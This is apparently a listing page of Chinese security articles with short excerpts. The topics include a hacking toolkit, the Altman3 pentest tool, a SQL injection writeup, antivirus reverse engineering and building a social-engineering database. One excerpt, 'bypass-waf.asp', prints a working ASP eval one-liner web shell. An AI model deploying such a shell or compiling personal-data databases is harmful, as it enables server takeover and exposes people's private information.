暗组2015扩展包:需要到论坛自行下载并添加即可: 暗组2015\Tools\安全检测\综合扫描\大型扫描器 暗组2015\Tools\安全检测\高级攻防\WinHac...
渗透测试软件:altman3
官方介绍: Altman3 免责申明:本程序仅供学习和研究! 请使用者遵守国家相关法律法规! 由于使用不当造成的后果本人不承担任何责任! 介绍&nbs...
bypass-waf.asp
<%dim x1,x2x1 = request("pass")x2 = x1eval x2%> <!-- yes++ --><!-- 一句话 pass...
射手网复活攻略:用百度快照和phantomjs让射手网复活
<imgsrc= title="sheshou.jpg"></imgsrc=>牢骚射手网关门了,声讨的话网上已经铺天盖地,我不想多啰嗦,我只说一句:某些部门...
一个人的武林:渗透测试常规思路分析(一)|
写在前面 渗透测试是门技术,也是一门艺术。 这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样;但是在这个过程中,思路无疑是最重要的...
走近科学:那些年,媒体笔下被夸大的黑客
“他们是黑客。在他们看来,攻破网站就好像在打电子游戏。选定目标网站,入侵你的网银账户,定位你的位置,扰乱毫不相干网民们的生活,他们无所不能”——这就是不少媒体笔下的黑客。 夸大式的报道成为了近几年来媒...
经验分享:社会工程学数据库搭建TIPS
最近一直在搞社工库的搭建。网上这方面也有很多文章,但是很少涉及到细节,在此与大家分享一些个人心得。 测试环境 测试坏境:windows server 2012(x64,16G&nb...
针对百度杀毒“雪狼引擎”的逆向分析
一、前言&引子 百无聊赖的夜晚,偶尔翻看到这么一篇介绍: “百度首度自研推出的核心查杀引擎「雪狼」,采用全新「量子查杀」技术。”“雪狼引擎依托百度大数据分析,通过海量样本的分析技术得到文件多...
IP.Board3.4.5中SQL注入漏洞的利用与分析
之前在FREEBUF上看到一篇文章,题目是《IP.Board<=3.4.7SQL注入漏洞(0day)POC》,对这个话题比较感兴趣,搭建了实验环境,进行了实验,便有了此文。 一、背景信息 首先先...
偏门系统拾遗:Tru64Unix系统搭建渗透指南
随着虚拟化技术的不断发展,给我们带来了越来越多的便利,让我们几乎可以模拟任何我们呢可以想到的设备。这里我们就利用这高超的虚拟化技术来摸拟一个并不是那么常用的操作系统Tru64Ubix操作系统,同时使用...